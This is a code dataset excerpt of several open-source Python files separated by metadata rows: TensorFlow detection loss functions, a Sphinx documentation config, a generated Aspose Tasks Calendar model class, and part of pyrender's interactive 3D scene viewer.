self._huber_loss = tf.keras.losses.Huber(
delta=params.huber_loss_delta, reduction=tf.keras.losses.Reduction.SUM)
def __call__(self, box_outputs, labels, num_positives):
"""Computes box detection loss.
Computes total detection loss including box and class loss from all levels.
Args:
box_outputs: an OrderedDict with keys representing levels and values
representing box regression targets in [batch_size, height, width,
num_anchors * 4].
labels: the dictionary returned from the dataloader that includes
box groundtruth targets.
num_positives: number of positive examples in the minibatch.
Returns:
a scalar tensor representing total box regression loss.
"""
# Sums all positives in a batch for normalization and avoids zero
# num_positives_sum, which would lead to inf loss during training
num_positives_sum = tf.reduce_sum(input_tensor=num_positives) + 1.0
box_losses = []
for level in box_outputs.keys():
# Onehot encoding for classification labels.
box_targets_l = labels[level]
box_losses.append(
self.box_loss(box_outputs[level], box_targets_l, num_positives_sum))
# Sums per level losses to total loss.
return tf.add_n(box_losses)
def box_loss(self, box_outputs, box_targets, num_positives):
"""Computes RetinaNet box regression loss."""
# The delta is typically around the mean value of regression target.
# for instances, the regression targets of 512x512 input with 6 anchors on
# P3-P7 pyramid is about [0.1, 0.1, 0.2, 0.2].
normalizer = num_positives * 4.0
mask = tf.cast(tf.not_equal(box_targets, 0.0), dtype=tf.float32)
box_targets = tf.expand_dims(box_targets, axis=-1)
box_outputs = tf.expand_dims(box_outputs, axis=-1)
box_loss = self._huber_loss(box_targets, box_outputs, sample_weight=mask)
box_loss /= normalizer
return box_loss
class ShapemaskMseLoss(object):
"""ShapeMask mask Mean Squared Error loss function wrapper."""
def __call__(self, probs, labels, valid_mask):
"""Compute instance segmentation loss.
Args:
probs: A Tensor of shape [batch_size * num_points, height, width,
num_classes]. The logits are not necessarily between 0 and 1.
labels: A float32/float16 Tensor of shape [batch_size, num_instances,
mask_size, mask_size], where mask_size =
mask_crop_size * gt_upsample_scale for fine mask, or mask_crop_size
for coarse masks and shape priors.
valid_mask: a binary mask indicating valid training masks.
Returns:
loss: a float tensor representing the total mask classification loss.
"""
with tf.name_scope('shapemask_prior_loss'):
batch_size, num_instances = valid_mask.get_shape().as_list()[:2]
diff = (tf.cast(labels, dtype=tf.float32) -
tf.cast(probs, dtype=tf.float32))
diff *= tf.cast(
tf.reshape(valid_mask, [batch_size, num_instances, 1, 1]),
tf.float32)
# Adding 0.001 in the denominator to avoid division by zero.
loss = tf.nn.l2_loss(diff) / (tf.reduce_sum(labels) + 0.001)
return loss
class ShapemaskLoss(object):
"""ShapeMask mask loss function wrapper."""
def __init__(self):
self._binary_crossentropy = tf.keras.losses.BinaryCrossentropy(
reduction=tf.keras.losses.Reduction.SUM, from_logits=True)
def __call__(self, logits, labels, valid_mask):
"""ShapeMask mask cross entropy loss function wrapper.
Args:
logits: A Tensor of shape [batch_size * num_instances, height, width,
num_classes]. The logits are not necessarily between 0 and 1.
labels: A float16/float32 Tensor of shape [batch_size, num_instances,
mask_size, mask_size], where mask_size =
mask_crop_size * gt_upsample_scale for fine mask, or mask_crop_size
for coarse masks and shape priors.
valid_mask: a binary mask of shape [batch_size, num_instances]
indicating valid training masks.
Returns:
loss: a float tensor representing the total mask classification loss.
"""
with tf.name_scope('shapemask_loss'):
batch_size, num_instances = valid_mask.get_shape().as_list()[:2]
labels = tf.cast(labels, tf.float32)
logits = tf.cast(logits, tf.float32)
loss = self._binary_crossentropy(labels, logits)
loss *= tf.cast(tf.reshape(
valid_mask, [batch_size, num_instances, 1, 1]), loss.dtype)
# Adding 0.001 in the denominator to avoid division by zero.
loss = tf.reduce_sum(loss) / (tf.reduce_sum(labels) + 0.001)
return loss
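# Illustrative usage sketch (not part of the original module): a minimal call
# to MaskrcnnLoss with random tensors, showing the expected input shapes.
# The shapes and values are assumptions for demonstration only, and the
# snippet assumes TF2 eager execution.
if __name__ == '__main__':
  _batch, _num_masks, _mask_size = 2, 3, 28
  _mask_outputs = tf.random.normal([_batch, _num_masks, _mask_size, _mask_size])
  _mask_targets = tf.cast(
      tf.random.uniform([_batch, _num_masks, _mask_size, _mask_size]) > 0.5,
      tf.float32)
  # Class 0 is treated as background, so those masks get zero weight.
  _select_class_targets = tf.constant([[1, 0, 2], [3, 1, 0]], dtype=tf.int32)
  _loss = MaskrcnnLoss()(_mask_outputs, _mask_targets, _select_class_targets)
  print('example mask loss:', float(_loss))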
| 42.545287
| 186
| 0.682626
|
4bf0c1266dd79e0aa7dad9942a18418f53c42b40
| 2,427
|
py
|
Python
|
docs/source/conf.py
|
rchui/laminar
|
63bcc813484bd8510bcfa93456e46118b7093b5e
|
[
"MIT"
] | null | null | null |
docs/source/conf.py
|
rchui/laminar
|
63bcc813484bd8510bcfa93456e46118b7093b5e
|
[
"MIT"
] | 1
|
2022-02-04T00:50:26.000Z
|
2022-02-04T00:50:26.000Z
|
docs/source/conf.py
|
rchui/laminar
|
83e03aa97a11943218fc792b0f33017200cb10be
|
[
"MIT"
] | null | null | null |
import os
import sys
from typing import Any
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath("../.."))
# -- Project information -----------------------------------------------------
project = "laminar"
copyright = "2021, Ryan Chui"
author = "Ryan Chui <ryan.w.chui@gmail.com>"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"myst_parser",
"sphinx.ext.autodoc",
"sphinx.ext.autosectionlabel",
"sphinx.ext.autosummary",
"sphinx.ext.githubpages",
"sphinx.ext.napoleon",
]
autosummary_generate = True # Make and include autosummary files
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
# exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ["_static"]
# -- Special members ---------------------------------------------------------
def skip(app: Any, what: Any, name: str, obj: Any, would_skip: bool, options: Any) -> bool:
if name == "__init__":
return False
return would_skip
def setup(app: Any) -> None:
app.connect("autodoc-skip-member", skip)
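For context, the `skip`/`setup` hook above exists only to keep `__init__` docstrings in the autodoc output. As a hedged aside (not part of this conf.py), newer Sphinx releases can usually express the same intent declaratively:

# Declarative alternative to the autodoc-skip-member hook above (Sphinx >= 1.8).
autodoc_default_options = {
    "special-members": "__init__",
}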
| 32.36
| 91
| 0.646889
|
2552f3e9b067632eb8aa7f91192f1ecce678d4e7
| 8,809
|
py
|
Python
|
asposetaskscloud/models/calendar.py
|
aspose-tasks-cloud/aspose-tasks-cloud-python
|
d1852a02fb1aa2591501a34d5e56079f8aac43f0
|
[
"MIT"
] | 2
|
2021-08-16T09:25:51.000Z
|
2022-01-27T20:20:41.000Z
|
asposetaskscloud/models/calendar.py
|
aspose-tasks-cloud/aspose-tasks-cloud-python
|
d1852a02fb1aa2591501a34d5e56079f8aac43f0
|
[
"MIT"
] | null | null | null |
asposetaskscloud/models/calendar.py
|
aspose-tasks-cloud/aspose-tasks-cloud-python
|
d1852a02fb1aa2591501a34d5e56079f8aac43f0
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# -----------------------------------------------------------------------------------
# <copyright company="Aspose" file="Calendar.py">
# Copyright (c) 2020 Aspose.Tasks Cloud
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# -----------------------------------------------------------------------------------
import pprint
import re # noqa: F401
import six
class Calendar(object):
"""Represents a calendar used in a project.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'uid': 'int',
'days': 'list[WeekDay]',
'is_base_calendar': 'bool',
'base_calendar': 'Calendar',
'is_baseline_calendar': 'bool'
}
attribute_map = {
'name': 'name',
'uid': 'uid',
'days': 'days',
'is_base_calendar': 'isBaseCalendar',
'base_calendar': 'baseCalendar',
'is_baseline_calendar': 'isBaselineCalendar'
}
def __init__(self, name=None, uid=None, days=None, is_base_calendar=None, base_calendar=None, is_baseline_calendar=None): # noqa: E501
"""Calendar - a model defined in Swagger""" # noqa: E501
self._name = None
self._uid = None
self._days = None
self._is_base_calendar = None
self._base_calendar = None
self._is_baseline_calendar = None
self.discriminator = None
if name is not None:
self.name = name
if uid is not None:
self.uid = uid
if days is not None:
self.days = days
if is_base_calendar is not None:
self.is_base_calendar = is_base_calendar
if base_calendar is not None:
self.base_calendar = base_calendar
if is_baseline_calendar is not None:
self.is_baseline_calendar = is_baseline_calendar
@property
def name(self):
"""Gets the name of this Calendar. # noqa: E501
The name of the calendar. # noqa: E501
:return: The name of this Calendar. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Calendar.
The name of the calendar. # noqa: E501
:param name: The name of this Calendar. # noqa: E501
:type: str
"""
self._name = name
@property
def uid(self):
"""Gets the uid of this Calendar. # noqa: E501
The unique identifier of the calendar. # noqa: E501
:return: The uid of this Calendar. # noqa: E501
:rtype: int
"""
return self._uid
@uid.setter
def uid(self, uid):
"""Sets the uid of this Calendar.
The unique identifier of the calendar. # noqa: E501
:param uid: The uid of this Calendar. # noqa: E501
:type: int
"""
if uid is None:
raise ValueError("Invalid value for `uid`, must not be `None`") # noqa: E501
self._uid = uid
@property
def days(self):
"""Gets the days of this Calendar. # noqa: E501
The collection of weekdays that defines the calendar. # noqa: E501
:return: The days of this Calendar. # noqa: E501
:rtype: list[WeekDay]
"""
return self._days
@days.setter
def days(self, days):
"""Sets the days of this Calendar.
The collection of weekdays that defines the calendar. # noqa: E501
:param days: The days of this Calendar. # noqa: E501
:type: list[WeekDay]
"""
self._days = days
@property
def is_base_calendar(self):
"""Gets the is_base_calendar of this Calendar. # noqa: E501
Determines whether the calendar is a base calendar. # noqa: E501
:return: The is_base_calendar of this Calendar. # noqa: E501
:rtype: bool
"""
return self._is_base_calendar
@is_base_calendar.setter
def is_base_calendar(self, is_base_calendar):
"""Sets the is_base_calendar of this Calendar.
Determines whether the calendar is a base calendar. # noqa: E501
:param is_base_calendar: The is_base_calendar of this Calendar. # noqa: E501
:type: bool
"""
if is_base_calendar is None:
raise ValueError("Invalid value for `is_base_calendar`, must not be `None`") # noqa: E501
self._is_base_calendar = is_base_calendar
@property
def base_calendar(self):
"""Gets the base_calendar of this Calendar. # noqa: E501
The base calendar on which this calendar depends. Only applicable if the calendar is not a base calendar. # noqa: E501
:return: The base_calendar of this Calendar. # noqa: E501
:rtype: Calendar
"""
return self._base_calendar
@base_calendar.setter
def base_calendar(self, base_calendar):
"""Sets the base_calendar of this Calendar.
The base calendar on which this calendar depends. Only applicable if the calendar is not a base calendar. # noqa: E501
:param base_calendar: The base_calendar of this Calendar. # noqa: E501
:type: Calendar
"""
self._base_calendar = base_calendar
@property
def is_baseline_calendar(self):
"""Gets the is_baseline_calendar of this Calendar. # noqa: E501
Specifies whether the calendar is a baseline calendar. # noqa: E501
:return: The is_baseline_calendar of this Calendar. # noqa: E501
:rtype: bool
"""
return self._is_baseline_calendar
@is_baseline_calendar.setter
def is_baseline_calendar(self, is_baseline_calendar):
"""Sets the is_baseline_calendar of this Calendar.
Specifies whether the calendar is a baseline calendar. # noqa: E501
:param is_baseline_calendar: The is_baseline_calendar of this Calendar. # noqa: E501
:type: bool
"""
if is_baseline_calendar is None:
raise ValueError("Invalid value for `is_baseline_calendar`, must not be `None`") # noqa: E501
self._is_baseline_calendar = is_baseline_calendar
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Calendar):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
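A hedged usage sketch for the generated model above; the attribute names come from `swagger_types`, while the concrete values and the `__main__` guard are illustrative only.

if __name__ == '__main__':
    # Build a base calendar and a dependent calendar, then round-trip to a dict.
    standard = Calendar(name='Standard', uid=1, is_base_calendar=True,
                        is_baseline_calendar=False)
    night_shift = Calendar(name='Night Shift', uid=2, is_base_calendar=False,
                           base_calendar=standard, is_baseline_calendar=False)
    print(night_shift.to_dict())    # base_calendar is serialized recursively
    print(night_shift == standard)  # False: __eq__ compares the full __dict__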
| 34.011583
| 139
| 0.601884
|
23170666ae6bf19e7e069a252d786a7db1dcfcb4
| 43,131
|
py
|
Python
|
pyrender/viewer.py
|
monsieurgustav/pyrender
|
10ada1d4f895a4e9272299347def675ec4ba4407
|
[
"MIT"
] | 53
|
2020-03-29T04:15:44.000Z
|
2022-03-19T02:49:12.000Z
|
pyrender/viewer.py
|
monsieurgustav/pyrender
|
10ada1d4f895a4e9272299347def675ec4ba4407
|
[
"MIT"
] | 3
|
2020-07-13T12:54:58.000Z
|
2020-11-18T15:50:04.000Z
|
pyrender/viewer.py
|
monsieurgustav/pyrender
|
10ada1d4f895a4e9272299347def675ec4ba4407
|
[
"MIT"
] | 7
|
2020-06-16T14:42:48.000Z
|
2021-04-13T04:34:52.000Z
|
"""A pyglet-based interactive 3D scene viewer.
"""
import copy
import os
import sys
from threading import Thread, RLock
import time
import imageio
import numpy as np
import OpenGL
import trimesh
try:
from Tkinter import Tk, tkFileDialog as filedialog
except Exception:
try:
from tkinter import Tk, filedialog as filedialog
except Exception:
pass
from .constants import (OPEN_GL_MAJOR, OPEN_GL_MINOR, TEXT_PADDING, DEFAULT_SCENE_SCALE,
DEFAULT_Z_FAR, DEFAULT_Z_NEAR, RenderFlags, TextAlign)
from .light import DirectionalLight
from .node import Node
from .camera import PerspectiveCamera, OrthographicCamera, IntrinsicsCamera
from .trackball import Trackball
from .renderer import Renderer
from .mesh import Mesh
import pyglet
from pyglet import clock
pyglet.options['shadow_window'] = False
class Viewer(pyglet.window.Window):
"""An interactive viewer for 3D scenes.
The viewer's camera is separate from the scene's, but will take on
the parameters of the scene's main view camera and start in the same pose.
If the scene does not have a camera, a suitable default will be provided.
Parameters
----------
scene : :class:`Scene`
The scene to visualize.
viewport_size : (2,) int
The width and height of the initial viewing window.
render_flags : dict
A set of flags for rendering the scene. Described in the note below.
viewer_flags : dict
A set of flags for controlling the viewer's behavior.
Described in the note below.
registered_keys : dict
A map from ASCII key characters to tuples containing:
- A function to be called whenever the key is pressed,
whose first argument will be the viewer itself.
- (Optionally) A list of additional positional arguments
to be passed to the function.
- (Optionally) A dict of keyword arguments to be passed
to the function.
kwargs : dict
Any keyword arguments left over will be interpreted as belonging to
either the :attr:`.Viewer.render_flags` or :attr:`.Viewer.viewer_flags`
dictionaries. Those flag sets will be updated appropriately.
Note
----
The basic commands for moving about the scene are given as follows:
- **Rotating about the scene**: Hold the left mouse button and
drag the cursor.
- **Rotating about the view axis**: Hold ``CTRL`` and the left mouse
button and drag the cursor.
- **Panning**:
- Hold SHIFT, then hold the left mouse button and drag the cursor, or
- Hold the middle mouse button and drag the cursor.
- **Zooming**:
- Scroll the mouse wheel, or
- Hold the right mouse button and drag the cursor.
Other keyboard commands are as follows:
- ``a``: Toggles rotational animation mode.
- ``c``: Toggles backface culling.
- ``f``: Toggles fullscreen mode.
- ``h``: Toggles shadow rendering.
- ``i``: Toggles axis display mode
(no axes, world axis, mesh axes, all axes).
- ``l``: Toggles lighting mode
(scene lighting, Raymond lighting, or direct lighting).
- ``m``: Toggles face normal visualization.
- ``n``: Toggles vertex normal visualization.
- ``o``: Toggles orthographic mode.
- ``q``: Quits the viewer.
- ``r``: Starts recording a GIF, and pressing again stops recording
and opens a file dialog.
- ``s``: Opens a file dialog to save the current view as an image.
- ``w``: Toggles wireframe mode
(scene default, flip wireframes, all wireframe, or all solid).
- ``z``: Resets the camera to the initial view.
Note
----
The valid keys for ``render_flags`` are as follows:
- ``flip_wireframe``: `bool`, If `True`, all objects will have their
wireframe modes flipped from what their material indicates.
Defaults to `False`.
- ``all_wireframe``: `bool`, If `True`, all objects will be rendered
in wireframe mode. Defaults to `False`.
- ``all_solid``: `bool`, If `True`, all objects will be rendered in
solid mode. Defaults to `False`.
- ``shadows``: `bool`, If `True`, shadows will be rendered.
Defaults to `False`.
- ``vertex_normals``: `bool`, If `True`, vertex normals will be
rendered as blue lines. Defaults to `False`.
- ``face_normals``: `bool`, If `True`, face normals will be rendered as
blue lines. Defaults to `False`.
- ``cull_faces``: `bool`, If `True`, backfaces will be culled.
Defaults to `True`.
- ``point_size`` : float, The point size in pixels. Defaults to 1px.
Note
----
The valid keys for ``viewer_flags`` are as follows:
- ``rotate``: `bool`, If `True`, the scene's camera will rotate
about an axis. Defaults to `False`.
- ``rotate_rate``: `float`, The rate of rotation in radians per second.
Defaults to `PI / 3.0`.
- ``rotate_axis``: `(3,) float`, The axis in world coordinates to rotate
about. Defaults to ``[0,0,1]``.
- ``view_center``: `(3,) float`, The position to rotate the scene about.
Defaults to the scene's centroid.
- ``use_raymond_lighting``: `bool`, If `True`, an additional set of three
directional lights that move with the camera will be added to the scene.
Defaults to `False`.
- ``use_direct_lighting``: `bool`, If `True`, an additional directional
light that moves with the camera and points out of it will be added to
the scene. Defaults to `False`.
- ``lighting_intensity``: `float`, The overall intensity of the
viewer's additional lights (when they're in use). Defaults to 3.0.
- ``use_perspective_cam``: `bool`, If `True`, a perspective camera will
be used. Otherwise, an orthographic camera is used. Defaults to `True`.
- ``save_directory``: `str`, A directory to open the file dialogs in.
Defaults to `None`.
- ``window_title``: `str`, A title for the viewer's application window.
Defaults to `"Scene Viewer"`.
- ``refresh_rate``: `float`, A refresh rate for rendering, in Hertz.
Defaults to `30.0`.
- ``fullscreen``: `bool`, Whether to make viewer fullscreen.
Defaults to `False`.
- ``show_world_axis``: `bool`, Whether to show the world axis.
Defaults to `False`.
- ``show_mesh_axes``: `bool`, Whether to show the individual mesh axes.
Defaults to `False`.
- ``caption``: `list of dict`, Text caption(s) to display on the viewer.
Defaults to `None`.
Note
----
Animation can be accomplished by running the viewer with ``run_in_thread``
enabled. Then, just run a loop in your main thread, updating the scene as
needed. Before updating the scene, be sure to acquire the
:attr:`.Viewer.render_lock`, and release it when your update is done.
"""
def __init__(self, scene, viewport_size=None,
render_flags=None, viewer_flags=None,
registered_keys=None, run_in_thread=False, **kwargs):
#######################################################################
# Save attributes and flags
#######################################################################
if viewport_size is None:
viewport_size = (640, 480)
self._scene = scene
self._viewport_size = viewport_size
self._render_lock = RLock()
self._is_active = False
self._should_close = False
self._run_in_thread = run_in_thread
self._default_render_flags = {
'flip_wireframe': False,
'all_wireframe': False,
'all_solid': False,
'shadows': False,
'vertex_normals': False,
'face_normals': False,
'cull_faces': True,
'point_size': 1.0,
}
self._default_viewer_flags = {
'mouse_pressed': False,
'rotate': False,
'rotate_rate': np.pi / 3.0,
'rotate_axis': np.array([0.0, 0.0, 1.0]),
'view_center': None,
'record': False,
'use_raymond_lighting': False,
'use_direct_lighting': False,
'lighting_intensity': 3.0,
'use_perspective_cam': True,
'save_directory': None,
'window_title': 'Scene Viewer',
'refresh_rate': 30.0,
'fullscreen': False,
'show_world_axis': False,
'show_mesh_axes': False,
'caption': None
}
self._render_flags = self._default_render_flags.copy()
self._viewer_flags = self._default_viewer_flags.copy()
self._viewer_flags['rotate_axis'] = (
self._default_viewer_flags['rotate_axis'].copy()
)
if render_flags is not None:
self._render_flags.update(render_flags)
if viewer_flags is not None:
self._viewer_flags.update(viewer_flags)
for key in kwargs:
if key in self.render_flags:
self._render_flags[key] = kwargs[key]
elif key in self.viewer_flags:
self._viewer_flags[key] = kwargs[key]
# TODO MAC OS BUG FOR SHADOWS
if sys.platform == 'darwin':
self._render_flags['shadows'] = False
self._registered_keys = {}
if registered_keys is not None:
self._registered_keys = {
ord(k.lower()): registered_keys[k] for k in registered_keys
}
#######################################################################
# Save internal settings
#######################################################################
# Set up caption stuff
self._message_text = None
self._ticks_till_fade = 2.0 / 3.0 * self.viewer_flags['refresh_rate']
self._message_opac = 1.0 + self._ticks_till_fade
# Set up raymond lights and direct lights
self._raymond_lights = self._create_raymond_lights()
self._direct_light = self._create_direct_light()
# Set up axes
self._axes = {}
self._axis_mesh = Mesh.from_trimesh(
trimesh.creation.axis(origin_size=0.1, axis_radius=0.05,
axis_length=1.0), smooth=False)
if self.viewer_flags['show_world_axis']:
self._set_axes(world=self.viewer_flags['show_world_axis'],
mesh=self.viewer_flags['show_mesh_axes'])
#######################################################################
# Set up camera node
#######################################################################
self._camera_node = None
self._prior_main_camera_node = None
self._default_camera_pose = None
self._default_persp_cam = None
self._default_orth_cam = None
self._trackball = None
self._saved_frames = []
# Extract main camera from scene and set up our mirrored copy
znear = None
zfar = None
if scene.main_camera_node is not None:
n = scene.main_camera_node
camera = copy.copy(n.camera)
if isinstance(camera, (PerspectiveCamera, IntrinsicsCamera)):
self._default_persp_cam = camera
znear = camera.znear
zfar = camera.zfar
elif isinstance(camera, OrthographicCamera):
self._default_orth_cam = camera
znear = camera.znear
zfar = camera.zfar
self._default_camera_pose = scene.get_pose(scene.main_camera_node)
self._prior_main_camera_node = n
# Set defaults as needed
if zfar is None:
zfar = max(scene.scale * 10.0, DEFAULT_Z_FAR)
if znear is None or znear == 0:
if scene.scale == 0:
znear = DEFAULT_Z_NEAR
else:
znear = min(scene.scale / 10.0, DEFAULT_Z_NEAR)
if self._default_persp_cam is None:
self._default_persp_cam = PerspectiveCamera(
yfov=np.pi / 3.0, znear=znear, zfar=zfar
)
if self._default_orth_cam is None:
xmag = ymag = scene.scale
if scene.scale == 0:
xmag = ymag = 1.0
self._default_orth_cam = OrthographicCamera(
xmag=xmag, ymag=ymag,
znear=znear,
zfar=zfar
)
if self._default_camera_pose is None:
self._default_camera_pose = self._compute_initial_camera_pose()
# Pick camera
if self.viewer_flags['use_perspective_cam']:
camera = self._default_persp_cam
else:
camera = self._default_orth_cam
self._camera_node = Node(
matrix=self._default_camera_pose, camera=camera
)
scene.add_node(self._camera_node)
scene.main_camera_node = self._camera_node
self._reset_view()
#######################################################################
# Initialize OpenGL context and renderer
#######################################################################
self._renderer = Renderer(
self._viewport_size[0], self._viewport_size[1],
self.render_flags['point_size']
)
self._is_active = True
if self.run_in_thread:
self._thread = Thread(target=self._init_and_start_app)
self._thread.start()
else:
self._init_and_start_app()
@property
def scene(self):
""":class:`.Scene` : The scene being visualized.
"""
return self._scene
@property
def viewport_size(self):
"""(2,) int : The width and height of the viewing window.
"""
return self._viewport_size
@property
def render_lock(self):
""":class:`threading.RLock` : If acquired, prevents the viewer from
rendering until released.
Run :meth:`.Viewer.render_lock.acquire` before making updates to
the scene in a different thread, and run
:meth:`.Viewer.render_lock.release` once you're done to let the viewer
continue.
"""
return self._render_lock
@property
def is_active(self):
"""bool : `True` if the viewer is active, or `False` if it has
been closed.
"""
return self._is_active
@property
def run_in_thread(self):
"""bool : Whether the viewer was run in a separate thread.
"""
return self._run_in_thread
@property
def render_flags(self):
"""dict : Flags for controlling the renderer's behavior.
- ``flip_wireframe``: `bool`, If `True`, all objects will have their
wireframe modes flipped from what their material indicates.
Defaults to `False`.
- ``all_wireframe``: `bool`, If `True`, all objects will be rendered
in wireframe mode. Defaults to `False`.
- ``all_solid``: `bool`, If `True`, all objects will be rendered in
solid mode. Defaults to `False`.
- ``shadows``: `bool`, If `True`, shadows will be rendered.
Defaults to `False`.
- ``vertex_normals``: `bool`, If `True`, vertex normals will be
rendered as blue lines. Defaults to `False`.
- ``face_normals``: `bool`, If `True`, face normals will be rendered as
blue lines. Defaults to `False`.
- ``cull_faces``: `bool`, If `True`, backfaces will be culled.
Defaults to `True`.
- ``point_size`` : float, The point size in pixels. Defaults to 1px.
"""
return self._render_flags
@render_flags.setter
def render_flags(self, value):
self._render_flags = value
@property
def viewer_flags(self):
"""dict : Flags for controlling the viewer's behavior.
The valid keys for ``viewer_flags`` are as follows:
- ``rotate``: `bool`, If `True`, the scene's camera will rotate
about an axis. Defaults to `False`.
- ``rotate_rate``: `float`, The rate of rotation in radians per second.
Defaults to `PI / 3.0`.
- ``rotate_axis``: `(3,) float`, The axis in world coordinates to
rotate about. Defaults to ``[0,0,1]``.
- ``view_center``: `(3,) float`, The position to rotate the scene
about. Defaults to the scene's centroid.
- ``use_raymond_lighting``: `bool`, If `True`, an additional set of
three directional lights that move with the camera will be added to
the scene. Defaults to `False`.
- ``use_direct_lighting``: `bool`, If `True`, an additional directional
light that moves with the camera and points out of it will be
added to the scene. Defaults to `False`.
- ``lighting_intensity``: `float`, The overall intensity of the
viewer's additional lights (when they're in use). Defaults to 3.0.
- ``use_perspective_cam``: `bool`, If `True`, a perspective camera will
be used. Otherwise, an orthographic camera is used. Defaults to
`True`.
- ``save_directory``: `str`, A directory to open the file dialogs in.
Defaults to `None`.
- ``window_title``: `str`, A title for the viewer's application window.
Defaults to `"Scene Viewer"`.
- ``refresh_rate``: `float`, A refresh rate for rendering, in Hertz.
Defaults to `30.0`.
- ``fullscreen``: `bool`, Whether to make viewer fullscreen.
Defaults to `False`.
- ``show_world_axis``: `bool`, Whether to show the world axis.
Defaults to `False`.
- ``show_mesh_axes``: `bool`, Whether to show the individual mesh axes.
Defaults to `False`.
- ``caption``: `list of dict`, Text caption(s) to display on
the viewer. Defaults to `None`.
"""
return self._viewer_flags
@viewer_flags.setter
def viewer_flags(self, value):
self._viewer_flags = value
@property
def registered_keys(self):
"""dict : Map from ASCII key character to a handler function.
This is a map from ASCII key characters to tuples containing:
- A function to be called whenever the key is pressed,
whose first argument will be the viewer itself.
- (Optionally) A list of additional positional arguments
to be passed to the function.
- (Optionally) A dict of keyword arguments to be passed
to the function.
"""
return self._registered_keys
@registered_keys.setter
def registered_keys(self, value):
self._registered_keys = value
def close_external(self):
"""Close the viewer from another thread.
        This function will wait for the actual close, so you can immediately
        manipulate the scene afterwards.
"""
self._should_close = True
while self.is_active:
time.sleep(1.0 / self.viewer_flags['refresh_rate'])
def save_gif(self, filename=None):
"""Save the stored GIF frames to a file.
        To use this asynchronously, run the viewer with the ``record``
        and ``run_in_thread`` flags set.
Kill the viewer after your desired time with
:meth:`.Viewer.close_external`, and then call :meth:`.Viewer.save_gif`.
Parameters
----------
filename : str
The file to save the GIF to. If not specified,
a file dialog will be opened to ask the user where
to save the GIF file.
"""
if filename is None:
filename = self._get_save_filename(['gif', 'all'])
if filename is not None:
self.viewer_flags['save_directory'] = os.path.dirname(filename)
imageio.mimwrite(filename, self._saved_frames,
fps=self.viewer_flags['refresh_rate'],
palettesize=128, subrectangles=True)
self._saved_frames = []
def on_close(self):
"""Exit the event loop when the window is closed.
"""
# Remove our camera and restore the prior one
if self._camera_node is not None:
self.scene.remove_node(self._camera_node)
if self._prior_main_camera_node is not None:
self.scene.main_camera_node = self._prior_main_camera_node
# Delete any lighting nodes that we've attached
if self.viewer_flags['use_raymond_lighting']:
for n in self._raymond_lights:
if self.scene.has_node(n):
self.scene.remove_node(n)
if self.viewer_flags['use_direct_lighting']:
if self.scene.has_node(self._direct_light):
self.scene.remove_node(self._direct_light)
# Delete any axis nodes that we've attached
self._remove_axes()
# Delete renderer
if self._renderer is not None:
self._renderer.delete()
self._renderer = None
# Force clean-up of OpenGL context data
try:
OpenGL.contextdata.cleanupContext()
self.close()
except Exception:
pass
finally:
self._is_active = False
super(Viewer, self).on_close()
pyglet.app.exit()
def on_draw(self):
"""Redraw the scene into the viewing window.
"""
if self._renderer is None:
return
if self.run_in_thread:
self.render_lock.acquire()
# Make OpenGL context current
self.switch_to()
# Render the scene
self.clear()
self._render()
if self._message_text is not None:
self._renderer.render_text(
self._message_text,
self.viewport_size[0] - TEXT_PADDING,
TEXT_PADDING,
font_pt=20,
color=np.array([0.1, 0.7, 0.2,
np.clip(self._message_opac, 0.0, 1.0)]),
align=TextAlign.BOTTOM_RIGHT
)
if self.viewer_flags['caption'] is not None:
for caption in self.viewer_flags['caption']:
xpos, ypos = self._location_to_x_y(caption['location'])
